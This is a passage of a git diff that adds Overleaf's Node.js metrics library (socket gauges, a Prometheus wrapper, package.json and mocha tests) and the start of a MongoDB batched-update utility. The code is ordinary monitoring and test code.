pool.options.maxPoolSize) + } + } + } +} + +module.exports = { monitor } diff --git a/libraries/metrics/open_sockets.js b/libraries/metrics/open_sockets.js new file mode 100644 index 0000000..da7241d --- /dev/null +++ b/libraries/metrics/open_sockets.js @@ -0,0 +1,99 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let OpenSocketsMonitor +const seconds = 1000 + +// In Node 0.10 the default is 5, which means only 5 open connections at one. +// Node 0.12 has a default of Infinity. Make sure we have no limit set, +// regardless of Node version. +require('node:http').globalAgent.maxSockets = Infinity +require('node:https').globalAgent.maxSockets = Infinity + +const SOCKETS_HTTP = require('node:http').globalAgent.sockets +const SOCKETS_HTTPS = require('node:https').globalAgent.sockets +const FREE_SOCKETS_HTTP = require('node:http').globalAgent.freeSockets +const FREE_SOCKETS_HTTPS = require('node:https').globalAgent.freeSockets + +// keep track of set gauges and reset them in the next collection cycle +const SEEN_HOSTS_HTTP = new Set() +const SEEN_HOSTS_HTTPS = new Set() +const FREE_SEEN_HOSTS_HTTP = new Set() +const FREE_SEEN_HOSTS_HTTPS = new Set() + +function collectConnectionsCount( + sockets, + seenHosts, + status, + https, + emitLegacyMetric +) { + const Metrics = require('./index') + Object.keys(sockets).forEach(host => seenHosts.add(host)) + seenHosts.forEach(host => { + // host: 'HOST:PORT:' + const hostname = host.split(':')[0] + const openConnections = (sockets[host] || []).length + if (!openConnections) { + seenHosts.delete(host) + } + Metrics.gauge('sockets', openConnections, 1, { + path: hostname, + method: https, + status, + }) + if (status === 'open' && emitLegacyMetric) { + // Emit legacy metric to keep old time series intact. + Metrics.gauge( + `${status}_connections.${https}.${hostname}`, + openConnections + ) + } + }) +} + +module.exports = OpenSocketsMonitor = { + monitor(emitLegacyMetric) { + const interval = setInterval( + () => OpenSocketsMonitor.gaugeOpenSockets(emitLegacyMetric), + 5 * seconds + ) + const Metrics = require('./index') + return Metrics.registerDestructor(() => clearInterval(interval)) + }, + + gaugeOpenSockets(emitLegacyMetric) { + collectConnectionsCount( + SOCKETS_HTTP, + SEEN_HOSTS_HTTP, + 'open', + 'http', + emitLegacyMetric + ) + collectConnectionsCount( + SOCKETS_HTTPS, + SEEN_HOSTS_HTTPS, + 'open', + 'https', + emitLegacyMetric + ) + collectConnectionsCount( + FREE_SOCKETS_HTTP, + FREE_SEEN_HOSTS_HTTP, + 'free', + 'http', + false + ) + collectConnectionsCount( + FREE_SOCKETS_HTTPS, + FREE_SEEN_HOSTS_HTTPS, + 'free', + 'https', + false + ) + }, +} diff --git a/libraries/metrics/package.json b/libraries/metrics/package.json new file mode 100644 index 0000000..384e58c --- /dev/null +++ b/libraries/metrics/package.json @@ -0,0 +1,45 @@ +{ + "name": "@overleaf/metrics", + "version": "4.2.0", + "description": "A drop-in metrics and monitoring module for node.js apps", + "repository": { + "type": "git", + "url": "https://github.com/overleaf/metrics-module.git" + }, + "main": "index.js", + "dependencies": { + "@google-cloud/opentelemetry-cloud-trace-exporter": "^2.1.0", + "@google-cloud/profiler": "^6.0.0", + "@opentelemetry/api": "^1.4.1", + "@opentelemetry/auto-instrumentations-node": "^0.39.1", + "@opentelemetry/exporter-trace-otlp-http": "^0.41.2", + "@opentelemetry/resources": "^1.15.2", + "@opentelemetry/sdk-node": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.15.2", + "compression": "^1.7.4", + "prom-client": "^14.1.1", + "yn": "^3.1.1" + }, + "devDependencies": { + "bunyan": "^1.0.0", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "scripts": { + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "test:acceptance": "mocha --reporter spec --recursive --exit --grep=$MOCHA_GREP test/acceptance", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "peerDependencies": { + "@overleaf/logger": "*" + } +} diff --git a/libraries/metrics/prom_wrapper.js b/libraries/metrics/prom_wrapper.js new file mode 100644 index 0000000..88f8374 --- /dev/null +++ b/libraries/metrics/prom_wrapper.js @@ -0,0 +1,177 @@ +const logger = require('@overleaf/logger') +const prom = require('prom-client') +const registry = require('prom-client').register +const metrics = new Map() + +const labelsKey = function (labels) { + let keys = Object.keys(labels) + if (keys.length === 0) { + return '' + } + + keys = keys.sort() + + let hash = '' + for (const key of keys) { + if (hash.length) { + hash += ',' + } + hash += `${key}:${labels[key]}` + } + + return hash +} + +const labelsAsArgs = function (labels, labelNames) { + const args = [] + for (const label of labelNames) { + args.push(labels[label] || '') + } + return args +} + +const PromWrapper = { + ttlInMinutes: 0, + registry, + + metric(type, name, labels, buckets) { + return metrics.get(name) || new MetricWrapper(type, name, labels, buckets) + }, + + collectDefaultMetrics: prom.collectDefaultMetrics, +} + +class MetricWrapper { + constructor(type, name, labels, buckets) { + metrics.set(name, this) + this.name = name + this.instances = new Map() + this.lastAccess = new Date() + + const labelNames = labels ? Object.keys(labels) : [] + switch (type) { + case 'counter': + this.metric = new prom.Counter({ + name, + help: name, + labelNames, + }) + break + case 'histogram': + this.metric = new prom.Histogram({ + name, + help: name, + labelNames, + buckets, + }) + break + case 'summary': + this.metric = new prom.Summary({ + name, + help: name, + maxAgeSeconds: 60, + ageBuckets: 10, + labelNames, + }) + break + case 'gauge': + this.metric = new prom.Gauge({ + name, + help: name, + labelNames, + }) + break + default: + throw new Error(`Unknown metric type: ${type}`) + } + } + + inc(labels, value) { + this._execMethod('inc', labels, value) + } + + observe(labels, value) { + this._execMethod('observe', labels, value) + } + + set(labels, value) { + this._execMethod('set', labels, value) + } + + sweep() { + const thresh = new Date(Date.now() - 1000 * 60 * PromWrapper.ttlInMinutes) + this.instances.forEach((instance, key) => { + if (thresh > instance.time) { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log( + 'Sweeping stale metric instance', + this.name, + { labels: instance.labels }, + key + ) + } + this.metric.remove( + ...labelsAsArgs(instance.labels, this.metric.labelNames) + ) + } + }) + + if (thresh > this.lastAccess) { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Sweeping stale metric', this.name, thresh, this.lastAccess) + } + metrics.delete(this.name) + registry.removeSingleMetric(this.name) + } + } + + _execMethod(method, labels, value) { + const key = labelsKey(labels) + if (key !== '') { + this.instances.set(key, { time: new Date(), labels }) + } + this.lastAccess = new Date() + try { + this.metric[method](labels, value) + } catch (err) { + logger.warn( + { err, metric: this.metric.name, labels }, + 'failed to record metric' + ) + } + } +} + +let sweepingInterval +PromWrapper.setupSweeping = function () { + if (sweepingInterval) { + clearInterval(sweepingInterval) + } + if (!PromWrapper.ttlInMinutes) { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Not registering sweep method -- empty ttl') + } + return + } + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Registering sweep method') + } + sweepingInterval = setInterval(function () { + if (process.env.DEBUG_METRICS) { + // eslint-disable-next-line no-console + console.log('Sweeping metrics') + } + metrics.forEach((metric, key) => { + metric.sweep() + }) + }, 60000) + + const Metrics = require('./index') + Metrics.registerDestructor(() => clearInterval(sweepingInterval)) +} + +module.exports = PromWrapper diff --git a/libraries/metrics/test/acceptance/metrics_tests.js b/libraries/metrics/test/acceptance/metrics_tests.js new file mode 100644 index 0000000..88f6138 --- /dev/null +++ b/libraries/metrics/test/acceptance/metrics_tests.js @@ -0,0 +1,343 @@ +const { promisify } = require('node:util') +const os = require('node:os') +const http = require('node:http') +const { expect } = require('chai') +const Metrics = require('../..') + +const HOSTNAME = os.hostname() +const APP_NAME = 'test-app' +const sleep = promisify(setTimeout) + +describe('Metrics module', function () { + before(function () { + process.env.METRICS_APP_NAME = 'test-app' + require('../../initialize') + }) + + describe('at startup', function () { + it('increments the process_startup counter', async function () { + await expectMetricValue('process_startup', 1) + }) + + it('collects default metrics', async function () { + const metric = await getMetric('process_cpu_user_seconds_total') + expect(metric).to.exist + }) + }) + + describe('inc()', function () { + it('increments counts by 1', async function () { + Metrics.inc('duck_count') + await expectMetricValue('duck_count', 1) + Metrics.inc('duck_count') + Metrics.inc('duck_count') + await expectMetricValue('duck_count', 3) + }) + + it('escapes special characters in the key', async function () { + Metrics.inc('show.me the $!!') + await expectMetricValue('show_me_the____', 1) + }) + }) + + describe('count()', function () { + it('increments counts by the given count', async function () { + Metrics.count('rabbit_count', 5) + await expectMetricValue('rabbit_count', 5) + Metrics.count('rabbit_count', 6) + Metrics.count('rabbit_count', 7) + await expectMetricValue('rabbit_count', 18) + }) + }) + + describe('summary()', function () { + it('collects observations', async function () { + Metrics.summary('oven_temp', 200) + Metrics.summary('oven_temp', 300) + Metrics.summary('oven_temp', 450) + const sum = await getSummarySum('oven_temp') + expect(sum).to.equal(950) + }) + }) + + describe('timing()', function () { + it('collects timings', async function () { + Metrics.timing('sprint_100m', 10) + Metrics.timing('sprint_100m', 20) + Metrics.timing('sprint_100m', 30) + const sum = await getSummarySum('timer_sprint_100m') + expect(sum).to.equal(60) + }) + }) + + describe('histogram()', function () { + it('collects in buckets', async function () { + const buckets = [10, 100, 1000] + Metrics.histogram('distance', 10, buckets) + Metrics.histogram('distance', 20, buckets) + Metrics.histogram('distance', 100, buckets) + Metrics.histogram('distance', 200, buckets) + Metrics.histogram('distance', 1000, buckets) + Metrics.histogram('distance', 2000, buckets) + const sum = await getSummarySum('histogram_distance') + expect(sum).to.equal(3330) + await checkHistogramValues('histogram_distance', { + 10: 1, + 100: 3, + 1000: 5, + '+Inf': 6, + }) + }) + }) + + describe('Timer', function () { + beforeEach('collect timings', async function () { + const buckets = [10, 100, 1000] + for (const duration of [1, 1, 1, 15, 15, 15, 105, 105, 105]) { + const withBuckets = new Metrics.Timer( + 'height', + 1, + { label_1: 'a' }, + buckets + ) + const withOutBuckets = new Metrics.Timer('depth', 1, { label_2: 'b' }) + await sleep(duration) + withBuckets.done() + withOutBuckets.done({ label_3: 'c' }) + } + }) + + it('with buckets', async function () { + await checkHistogramValues('histogram_height', { + 10: 3, + 100: 6, + 1000: 9, + '+Inf': 9, + }) + const labelNames = await getMetric('histogram_height').labelNames + expect(labelNames).to.deep.equal(['label_1']) + }) + + it('without buckets', async function () { + await checkSummaryValues('timer_depth', { + 0.01: 1, + 0.05: 1, + 0.5: 15, + 0.9: 105, + 0.95: 105, + 0.99: 105, + 0.999: 105, + }) + const labelNames = await getMetric('timer_depth').labelNames + expect(labelNames).to.deep.equal(['label_2', 'label_3']) + }) + }) + + describe('gauge()', function () { + it('records values', async function () { + Metrics.gauge('water_level', 1.5) + await expectMetricValue('water_level', 1.5) + Metrics.gauge('water_level', 4.2) + await expectMetricValue('water_level', 4.2) + }) + }) + + describe('globalGauge()', function () { + it('records values without a host label', async function () { + Metrics.globalGauge('tire_pressure', 99.99) + const { value, labels } = await getMetricValue('tire_pressure') + expect(value).to.equal(99.99) + expect(labels.host).to.equal('global') + expect(labels.app).to.equal(APP_NAME) + }) + }) + + describe('open_sockets', function () { + const keyServer1 = 'open_connections_http_127_42_42_1' + const keyServer2 = 'open_connections_http_127_42_42_2' + + let finish1, finish2, emitResponse1, emitResponse2 + function resetEmitResponse1() { + emitResponse1 = new Promise(resolve => (finish1 = resolve)) + } + resetEmitResponse1() + function resetEmitResponse2() { + emitResponse2 = new Promise(resolve => (finish2 = resolve)) + } + resetEmitResponse2() + + let server1, server2 + before(function setupServer1(done) { + server1 = http.createServer((req, res) => { + res.write('...') + emitResponse1.then(() => res.end()) + }) + server1.listen(0, '127.42.42.1', done) + }) + before(function setupServer2(done) { + server2 = http.createServer((req, res) => { + res.write('...') + emitResponse2.then(() => res.end()) + }) + server2.listen(0, '127.42.42.2', done) + }) + after(function cleanupPendingRequests() { + finish1() + finish2() + }) + after(function shutdownServer1(done) { + if (server1) server1.close(done) + }) + after(function shutdownServer2(done) { + if (server2) server2.close(done) + }) + + let urlServer1, urlServer2 + before(function setUrls() { + urlServer1 = `http://127.42.42.1:${server1.address().port}/` + urlServer2 = `http://127.42.42.2:${server2.address().port}/` + }) + describe('gaugeOpenSockets()', function () { + beforeEach(function runGaugeOpenSockets() { + Metrics.open_sockets.gaugeOpenSockets(true) + }) + + describe('without pending connections', function () { + it('emits no open_connections', async function () { + await expectNoMetricValue(keyServer1) + await expectNoMetricValue(keyServer2) + }) + }) + + describe('with pending connections for server1', function () { + before(function (done) { + http.get(urlServer1) + http.get(urlServer1) + setTimeout(done, 10) + }) + + it('emits 2 open_connections for server1', async function () { + await expectMetricValue(keyServer1, 2) + }) + + it('emits no open_connections for server2', async function () { + await expectNoMetricValue(keyServer2) + }) + }) + + describe('with pending connections for server1 and server2', function () { + before(function (done) { + http.get(urlServer2) + http.get(urlServer2) + setTimeout(done, 10) + }) + + it('emits 2 open_connections for server1', async function () { + await expectMetricValue(keyServer1, 2) + }) + + it('emits 2 open_connections for server2', async function () { + await expectMetricValue(keyServer2, 2) + }) + }) + + describe('when requests finish for server1', function () { + before(function (done) { + finish1() + resetEmitResponse1() + http.get(urlServer1) + + setTimeout(done, 10) + }) + + it('emits 1 open_connections for server1', async function () { + await expectMetricValue(keyServer1, 1) + }) + + it('emits 2 open_connections for server2', async function () { + await expectMetricValue(keyServer2, 2) + }) + }) + + describe('when all requests complete', function () { + before(function (done) { + finish1() + finish2() + + setTimeout(done, 10) + }) + + it('emits no open_connections', async function () { + await expectNoMetricValue(keyServer1) + await expectNoMetricValue(keyServer2) + }) + }) + }) + }) +}) + +function getMetric(key) { + return Metrics.register.getSingleMetric(key) +} + +async function getSummarySum(key) { + const metric = getMetric(key) + const item = await metric.get() + for (const value of item.values) { + if (value.metricName === `${key}_sum`) { + return value.value + } + } + return null +} + +async function checkHistogramValues(key, values) { + const metric = getMetric(key) + const item = await metric.get() + const found = {} + for (const value of item.values) { + const bucket = value.labels.le + if (!bucket) continue + found[bucket] = value.value + } + expect(found).to.deep.equal(values) + return null +} + +async function checkSummaryValues(key, values) { + const metric = getMetric(key) + const item = await metric.get() + const found = {} + for (const value of item.values) { + const quantile = value.labels.quantile + if (!quantile) continue + found[quantile] = value.value + } + for (const quantile of Object.keys(values)) { + expect(found[quantile]).to.be.within( + values[quantile] - 5, + values[quantile] + 15, + `quantile: ${quantile}` + ) + } + return null +} + +async function getMetricValue(key) { + const metrics = await Metrics.register.getMetricsAsJSON() + const metric = metrics.find(m => m.name === key) + return metric.values[0] +} + +async function expectMetricValue(key, expectedValue) { + const value = await getMetricValue(key) + expect(value.value).to.equal(expectedValue) + expect(value.labels.host).to.equal(HOSTNAME) + expect(value.labels.app).to.equal(APP_NAME) +} + +async function expectNoMetricValue(key) { + const metric = getMetric(key) + if (!metric) return + await expectMetricValue(key, 0) +} diff --git a/libraries/metrics/test/unit/js/event_loop.js b/libraries/metrics/test/unit/js/event_loop.js new file mode 100644 index 0000000..97b9fdd --- /dev/null +++ b/libraries/metrics/test/unit/js/event_loop.js @@ -0,0 +1,44 @@ +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const chai = require('chai') +const { expect } = chai +const path = require('node:path') +const modulePath = path.join(__dirname, '../../../event_loop.js') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') + +describe('event_loop', function () { + before(function () { + this.metrics = { + timing: sinon.stub(), + registerDestructor: sinon.stub(), + } + this.logger = { + warn: sinon.stub(), + } + return (this.event_loop = SandboxedModule.require(modulePath, { + requires: { + './index': this.metrics, + }, + })) + }) + + describe('with a logger provided', function () { + before(function () { + return this.event_loop.monitor(this.logger) + }) + + return it('should register a destructor with metrics', function () { + return expect(this.metrics.registerDestructor.called).to.equal(true) + }) + }) + + return describe('without a logger provided', function () { + return it('should throw an exception', function () { + return expect(this.event_loop.monitor).to.throw('logger is undefined') + }) + }) +}) diff --git a/libraries/metrics/test/unit/js/http.js b/libraries/metrics/test/unit/js/http.js new file mode 100644 index 0000000..7b6bb30 --- /dev/null +++ b/libraries/metrics/test/unit/js/http.js @@ -0,0 +1,171 @@ +const Path = require('node:path') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') + +const MODULE_PATH = Path.join(__dirname, '../../../http.js') + +describe('http.monitor', function () { + beforeEach(function () { + this.req = { + method: 'POST', + url: '/project/1234/cleanup', + headers: { + 'content-length': '123', + }, + route: { + path: '/project/:id/cleanup', + }, + } + this.originalResponseEnd = sinon.stub() + this.res = { + end: this.originalResponseEnd, + } + this.data = 'data' + this.logger = { + debug: sinon.stub(), + info: sinon.stub(), + warn: sinon.stub(), + } + this.Metrics = { + timing: sinon.stub(), + summary: sinon.stub(), + } + this.clock = sinon.useFakeTimers() + + this.http = SandboxedModule.require(MODULE_PATH, { + requires: { + './index': this.Metrics, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('with the default options', function () { + beforeEach('set up the monitor', function (done) { + this.http.monitor(this.logger)(this.req, this.res, done) + }) + + describe('after a simple request', function () { + endRequest() + expectOriginalEndCalled() + expectMetrics() + + it('logs the request at the DEBUG level', function () { + sinon.assert.calledWith( + this.logger.debug, + { req: this.req, res: this.res, responseTimeMs: 500 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) + + describe('when logging is disabled', function () { + beforeEach('disable logging', function () { + this.req.logger.disable() + }) + + endRequest() + expectOriginalEndCalled() + expectMetrics() + + it("doesn't log the request", function () { + sinon.assert.notCalled(this.logger.debug) + }) + }) + + describe('with custom log fields', function () { + beforeEach('add custom fields', function () { + this.req.logger.addFields({ a: 1, b: 2 }) + }) + + endRequest() + + it('logs the request with the custom log fields', function () { + sinon.assert.calledWith( + this.logger.debug, + { req: this.req, res: this.res, responseTimeMs: 500, a: 1, b: 2 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) + + describe('when setting the log level', function () { + beforeEach('set custom level', function () { + this.req.logger.setLevel('warn') + }) + + endRequest() + + it('logs the request at the custom level', function () { + sinon.assert.calledWith( + this.logger.warn, + { req: this.req, res: this.res, responseTimeMs: 500 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) + }) + + describe('with a different default log level', function () { + beforeEach('set up the monitor', function (done) { + this.http.monitor(this.logger, 'info')(this.req, this.res, done) + }) + + endRequest() + + it('logs the request at that level', function () { + sinon.assert.calledWith( + this.logger.info, + { req: this.req, res: this.res, responseTimeMs: 500 }, + '%s %s', + this.req.method, + this.req.url + ) + }) + }) +}) + +function endRequest() { + beforeEach('end the request', function () { + this.clock.tick(500) + this.res.end(this.data) + }) +} + +function expectOriginalEndCalled() { + it('calls the original res.end()', function () { + sinon.assert.calledWith(this.originalResponseEnd, this.data) + }) +} + +function expectMetrics() { + it('records the response time', function () { + sinon.assert.calledWith(this.Metrics.timing, 'http_request', 500, null, { + method: this.req.method, + status_code: this.res.status_code, + path: 'project_id_cleanup', + }) + }) + + it('records the request size', function () { + sinon.assert.calledWith( + this.Metrics.summary, + 'http_request_size_bytes', + 123, + { + method: this.req.method, + status_code: this.res.status_code, + path: 'project_id_cleanup', + } + ) + }) +} diff --git a/libraries/metrics/test/unit/js/mongodb.js b/libraries/metrics/test/unit/js/mongodb.js new file mode 100644 index 0000000..f74ece4 --- /dev/null +++ b/libraries/metrics/test/unit/js/mongodb.js @@ -0,0 +1,89 @@ +const Metrics = require('../../..') + +const { expect } = require('chai') +const prom = require('prom-client') + +describe('mongodb', function () { + beforeEach(function () { + prom.register.clear() + this.pool = { + totalConnectionCount: 8, + availableConnectionCount: 2, + waitQueueSize: 4, + options: { maxPoolSize: 10 }, + } + this.servers = new Map([['server1', { s: { pool: this.pool } }]]) + + this.mongoClient = { topology: { s: { servers: this.servers } } } + }) + + it('handles an unconnected client', async function () { + const mongoClient = {} + Metrics.mongodb.monitor(mongoClient) + const metrics = await getMetrics() + expect(metrics).to.deep.equal({}) + }) + + it('collects Mongo metrics', async function () { + Metrics.mongodb.monitor(this.mongoClient) + const metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server1': 10, + 'mongo_connection_pool_size:server1': 8, + 'mongo_connection_pool_available:server1': 2, + 'mongo_connection_pool_waiting:server1': 4, + }) + }) + + it('handles topology changes', async function () { + Metrics.mongodb.monitor(this.mongoClient) + let metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server1': 10, + 'mongo_connection_pool_size:server1': 8, + 'mongo_connection_pool_available:server1': 2, + 'mongo_connection_pool_waiting:server1': 4, + }) + + // Add a server + this.servers.set('server2', this.servers.get('server1')) + metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server1': 10, + 'mongo_connection_pool_size:server1': 8, + 'mongo_connection_pool_available:server1': 2, + 'mongo_connection_pool_waiting:server1': 4, + 'mongo_connection_pool_max:server2': 10, + 'mongo_connection_pool_size:server2': 8, + 'mongo_connection_pool_available:server2': 2, + 'mongo_connection_pool_waiting:server2': 4, + }) + + // Delete a server + this.servers.delete('server1') + metrics = await getMetrics() + expect(metrics).to.deep.equal({ + 'mongo_connection_pool_max:server2': 10, + 'mongo_connection_pool_size:server2': 8, + 'mongo_connection_pool_available:server2': 2, + 'mongo_connection_pool_waiting:server2': 4, + }) + + // Delete another server + this.servers.delete('server2') + metrics = await getMetrics() + expect(metrics).to.deep.equal({}) + }) +}) + +async function getMetrics() { + const metrics = await prom.register.getMetricsAsJSON() + const result = {} + for (const metric of metrics) { + for (const value of metric.values) { + const key = `${metric.name}:${value.labels.mongo_server}` + result[key] = value.value + } + } + return result +} diff --git a/libraries/metrics/tsconfig.json b/libraries/metrics/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/metrics/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/metrics/uv_threadpool_size.js b/libraries/metrics/uv_threadpool_size.js new file mode 100644 index 0000000..78a9431 --- /dev/null +++ b/libraries/metrics/uv_threadpool_size.js @@ -0,0 +1,5 @@ +if (!process.env.UV_THREADPOOL_SIZE) { + process.env.UV_THREADPOOL_SIZE = 16 + // eslint-disable-next-line no-console + console.log(`Set UV_THREADPOOL_SIZE=${process.env.UV_THREADPOOL_SIZE}`) +} diff --git a/libraries/mongo-utils/.gitignore b/libraries/mongo-utils/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/libraries/mongo-utils/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/mongo-utils/.nvmrc b/libraries/mongo-utils/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/mongo-utils/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/mongo-utils/batchedUpdate.js b/libraries/mongo-utils/batchedUpdate.js new file mode 100644 index 0000000..7e3ad67 --- /dev/null +++ b/libraries/mongo-utils/batchedUpdate.js @@ -0,0 +1,317 @@ +// @ts-check +/* eslint-disable no-console */ +const { ObjectId, ReadPreference } = require('mongodb') + +const READ_PREFERENCE_SECONDARY = + process.env.MONGO_HAS_SECONDARIES === 'true' + ? ReadPreference.secondary.mode + : ReadPreference.secondaryPreferred.mode + +const ONE_MONTH_IN_MS = 1000 * 60 * 60 * 24 * 31 +let ID_EDGE_PAST +const ID_EDGE_FUTURE = objectIdFromMs(Date.now() + 1000) +let BATCH_DESCENDING +let BATCH_SIZE +let VERBOSE_LOGGING +let BATCH_RANGE_START +let BATCH_RANGE_END +let BATCH_MAX_TIME_SPAN_IN_MS +let BATCHED_UPDATE_RUNNING = false + +/** + * @typedef {import("mongodb").Collection} Collection + * @typedef {import("mongodb-legacy").Collection} LegacyCollection + * @typedef {import("mongodb").Document} Document + * @typedef {import("mongodb").FindOptions} FindOptions + * @typedef {import("mongodb").UpdateFilter} UpdateDocument + */ + +/** + * @typedef {Object} BatchedUpdateOptions + * @property {string} [BATCH_DESCENDING] + * @property {string} [BATCH_LAST_ID] + * @property {string} [BATCH_MAX_TIME_SPAN_IN_MS] + * @property {string} [BATCH_RANGE_END] + * @property {string} [BATCH_RANGE_START] + * @property {string} [BATCH_SIZE] + * @property {string} [VERBOSE_LOGGING] + */ + +/** + * @param {BatchedUpdateOptions} options + */ +function refreshGlobalOptionsForBatchedUpdate(options = {}) { + options = Object.assign({}, options, process.env) + + BATCH_DESCENDING = options.BATCH_DESCENDING === 'true' + BATCH_SIZE = parseInt(options.BATCH_SIZE || '1000', 10) || 1000 + VERBOSE_LOGGING = options.VERBOSE_LOGGING === 'true' + if (options.BATCH_LAST_ID) { + BATCH_RANGE_START = objectIdFromInput(options.BATCH_LAST_ID) + } else if (options.BATCH_RANGE_START) { + BATCH_RANGE_START = objectIdFromInput(options.BATCH_RANGE_START) + } else { + if (BATCH_DESCENDING) { + BATCH_RANGE_START = ID_EDGE_FUTURE + } else { + BATCH_RANGE_START = ID_EDGE_PAST + } + } + BATCH_MAX_TIME_SPAN_IN_MS = parseInt( + options.BATCH_MAX_TIME_SPAN_IN_MS || ONE_MONTH_IN_MS.toString(), + 10 + ) + if (options.BATCH_RANGE_END) { + BATCH_RANGE_END = objectIdFromInput(options.BATCH_RANGE_END) + } else { + if (BATCH_DESCENDING) { + BATCH_RANGE_END = ID_EDGE_PAST + } else { + BATCH_RANGE_END = ID_EDGE_FUTURE + } + } +} + +/** + * @param {Collection | LegacyCollection} collection + * @param {Document} query + * @param {ObjectId} start + * @param {ObjectId} end + * @param {Document} projection + * @param {FindOptions} findOptions + * @return {Promise>} + */ +async function getNextBatch( + collection, + query, + start, + end, + projection, + findOptions +) { + if (BATCH_DESCENDING) { + query._id = { + $gt: end, + $lte: start, + } + } else { + query._id = { + $gt: start, + $lte: end, + } + } + return await collection + .find(query, findOptions) + .project(projection) + .sort({ _id: BATCH_DESCENDING ? -1 : 1 }) + .limit(BATCH_SIZE) + .toArray() +} + +/** + * @param {Collection | LegacyCollection} collection + * @param {Array} nextBatch + * @param {UpdateDocument} update + * @return {Promise} + */ +async function performUpdate(collection, nextBatch, update) { + await collection.updateMany( + { _id: { $in: nextBatch.map(entry => entry._id) } }, + update + ) +} + +/** + * @param {string} input + * @return {ObjectId} + */ +function objectIdFromInput(input) { + if (input.includes('T')) { + const t = new Date(input).getTime() + if (Number.isNaN(t)) throw new Error(`${input} is not a valid date`) + return objectIdFromMs(t) + } else { + return new ObjectId(input) + } +} + +/** + * @param {ObjectId} objectId + * @return {string} + */ +function renderObjectId(objectId) { + return `${objectId} (${objectId.getTimestamp().toISOString()})` +} + +/** + * @param {number} ms + * @return {ObjectId} + */ +function objectIdFromMs(ms) { + return ObjectId.createFromTime(ms / 1000) +} + +/** + * @param {ObjectId} id + * @return {number} + */ +function getMsFromObjectId(id) { + return id.getTimestamp().getTime() +} + +/** + * @param {ObjectId} start + * @return {ObjectId} + */ +function getNextEnd(start) { + let end + if (BATCH_DESCENDING) { + end = objectIdFromMs(getMsFromObjectId(start) - BATCH_MAX_TIME_SPAN_IN_MS) + if (getMsFromObjectId(end) <= getMsFromObjectId(BATCH_RANGE_END)) { + end = BATCH_RANGE_END + } + } else { + end = objectIdFromMs(getMsFromObjectId(start) + BATCH_MAX_TIME_SPAN_IN_MS) + if (getMsFromObjectId(end) >= getMsFromObjectId(BATCH_RANGE_END)) { + end = BATCH_RANGE_END + } + } + return end +} + +/** + * @param {Collection | LegacyCollection} collection + * @return {Promise} + */ +async function getIdEdgePast(collection) { + const [first] = await collection + .find({}) + .project({ _id: 1 }) + .sort({ _id: 1 }) + .limit(1) + .toArray() + if (!first) return null + // Go one second further into the past in order to include the first entry via + // first._id > ID_EDGE_PAST + return objectIdFromMs(Math.max(0, getMsFromObjectId(first._id) - 1000)) +} + +/** + * @param {Collection | LegacyCollection} collection + * @param {Document} query + * @param {UpdateDocument | ((batch: Array) => Promise)} update + * @param {Document} [projection] + * @param {FindOptions} [findOptions] + * @param {BatchedUpdateOptions} [batchedUpdateOptions] + */ +async function batchedUpdate( + collection, + query, + update, + projection, + findOptions, + batchedUpdateOptions +) { + // only a single batchedUpdate can run at a time due to global variables + if (BATCHED_UPDATE_RUNNING) { + throw new Error('batchedUpdate is already running') + } + try { + BATCHED_UPDATE_RUNNING = true + ID_EDGE_PAST = await getIdEdgePast(collection) + if (!ID_EDGE_PAST) { + console.warn( + `The collection ${collection.collectionName} appears to be empty.` + ) + return 0 + } + refreshGlobalOptionsForBatchedUpdate(batchedUpdateOptions) + + findOptions = findOptions || {} + findOptions.readPreference = READ_PREFERENCE_SECONDARY + + projection = projection || { _id: 1 } + let nextBatch + let updated = 0 + let start = BATCH_RANGE_START + + while (start !== BATCH_RANGE_END) { + let end = getNextEnd(start) + nextBatch = await getNextBatch( + collection, + query, + start, + end, + projection, + findOptions + ) + if (nextBatch.length > 0) { + end = nextBatch[nextBatch.length - 1]._id + updated += nextBatch.length + + if (VERBOSE_LOGGING) { + console.log( + `Running update on batch with ids ${JSON.stringify( + nextBatch.map(entry => entry._id) + )}` + ) + } else { + console.error(`Running update on batch ending ${renderObjectId(end)}`) + } + + if (typeof update === 'function') { + await 